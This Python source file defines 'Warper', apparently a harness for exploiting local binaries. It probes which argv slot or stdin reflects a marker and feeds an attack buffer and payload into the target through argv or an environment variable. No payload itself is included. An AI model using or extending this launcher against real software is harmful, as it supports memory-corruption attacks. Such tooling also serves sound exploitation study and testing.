import os
from subprocess import Popen, PIPE
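class Warper:
    """Launch a target binary with a probe buffer and a payload string.

    The constructor accepts one to three positional values:

    * ``Warper(path)`` -- probe the binary with :meth:`getArg` to find which
      input reflects the marker string; the process exits if none does.
    * ``Warper(path, argSploit)`` -- the buffer goes in ``argv[argSploit]``
      and the payload is passed through the ``pwniz`` environment variable.
    * ``Warper(path, argSploit, argPayload)`` -- buffer and payload go in two
      distinct ``argv`` slots.

    NOTE(review): the source arrived with its indentation stripped; the
    nesting below is reconstructed from the control flow and should be
    confirmed against the original file.
    """

    # Number of argv slots getArg() tries before giving up.
    _MAX_ARGV_PROBE = 20

    def __init__(self, *data):
        # Local import: only the failure path below needs it.
        import sys

        if not 1 <= len(data) <= 3:
            raise TypeError('expected (path[, argSploit[, argPayload]])')
        if not isinstance(data[0], str):
            raise TypeError('path must be a str')

        # Work on a private copy: spwn() writes the payload into this
        # mapping, and writing into os.environ itself would leak it into
        # the parent process and every unrelated child it starts later.
        self.env = os.environ.copy()
        self.input = True
        self.path = data[0]

        if len(data) == 1:
            if self.getArg() < 0:
                print('\x1B[0;31mUnable to find vuln\x1B[0m')
                # os._exit() skips buffer flushing, so flush explicitly or
                # the message above can be lost when stdout is not a tty.
                sys.stdout.flush()
                os._exit(-1)
        elif len(data) == 2:
            self.argSploit = data[1]
            self.argPayload = 0
        else:
            if data[1] == data[2]:
                raise ValueError('argSploit and argPayload must differ')
            self.argSploit = data[1]
            self.argPayload = data[2]

        # Single parenthesised argument: prints the same text whether print
        # is a statement or a function.
        print('\x1B[0;32mVuln in argv %d, sploit in %d\x1B[0m'
              % (self.argSploit, self.argPayload))

    def spwn(self, buff, payload, std):
        """Create a process laid out according to the configured slots.

        ``buff`` is placed in ``argv[argSploit]`` and ``payload`` in
        ``argv[argPayload]``; unused slots in between are filled with
        ``'x'``. When ``argPayload`` is 0 the payload is passed in the
        ``pwniz`` environment variable instead.

        ``std`` is either an int bitmask selecting which streams are piped
        (1 = stdin, 2 = stdout, 4 = stderr; a negative value asks for the
        negated exit status), or a non-int value that is written to the
        child's stdin with all three streams piped.

        Returns the ``(stdout, stderr)`` tuple from ``communicate()``, the
        negated exit status when ``std`` is a negative int, or ``' '`` when
        the process could not be started or driven.
        """
        stdin = stdout = stderr = None
        # A non-int ``std`` is data for the child's stdin, not a bitmask.
        final = not isinstance(std, int)

        args = [self.path]
        last_slot = max(self.argSploit, self.argPayload)
        for slot in range(1, last_slot + 1):
            if slot == self.argSploit:
                args.append(buff)
            elif slot == self.argPayload:
                args.append(payload)
            else:
                args.append('x')

        if self.argPayload == 0:
            self.env['pwniz'] = payload

        if final or std & 1 or self.input:
            stdin = PIPE
        if final or std & 2 or std < 0:
            stdout = PIPE
        if final or std & 4:
            stderr = PIPE

        try:
            p = Popen(args, env=self.env, stdin=stdin, stdout=stdout,
                      stderr=stderr)
            if self.input:
                ret = p.communicate(buff)
            elif not final:
                ret = p.communicate()
            # NOTE(review): when self.input and final are both true this is
            # a second communicate() on the same process; it looks like that
            # call fails and ends in the handler below -- confirm intent.
            if final:
                ret = p.communicate(std)
        except Exception:
            # Best-effort: any launch or I/O failure yields a one-character
            # string so callers indexing [0] still work. KeyboardInterrupt
            # and SystemExit are deliberately allowed to propagate.
            return ' '

        if not final and std < 0:
            # subprocess reports death by signal N as returncode -N, so the
            # negation turns it into a positive signal number.
            return p.wait() * -1
        return ret

    def getArg(self):
        """Dynamically find the reflecting input and where the payload goes.

        Sends the marker ``'AAAA'`` first with stdin feeding enabled, then
        through successive ``argv`` slots, until it shows up in the child's
        stdout. Sets ``self.input``, ``self.argSploit`` and
        ``self.argPayload``; returns 0 on success and -1 when every slot was
        tried without a match.
        """
        self.argPayload = 0
        self.argSploit = 0

        out = self.spwn('AAAA', '', 3)[0]
        if out.find('AAAA') < 0:
            # stdin is not reflected: stop feeding it and walk argv instead.
            self.input = False
            for _ in range(self._MAX_ARGV_PROBE):
                out = self.spwn('AAAA', '', 3)[0]
                if out.find('AAAA') >= 0:
                    break
                self.argSploit = self.argSploit + 1

        # Check whether the marker survives an extra argument after it; if
        # not, fall back to the environment variable (argPayload == 0).
        self.argPayload = self.argSploit + 1
        out = self.spwn('AAAA', 'x', 3)[0]
        if out.find('AAAA') < 0:
            self.argPayload = 0

        if self.argSploit == self._MAX_ARGV_PROBE and self.argPayload == 0:
            return -1
        return 0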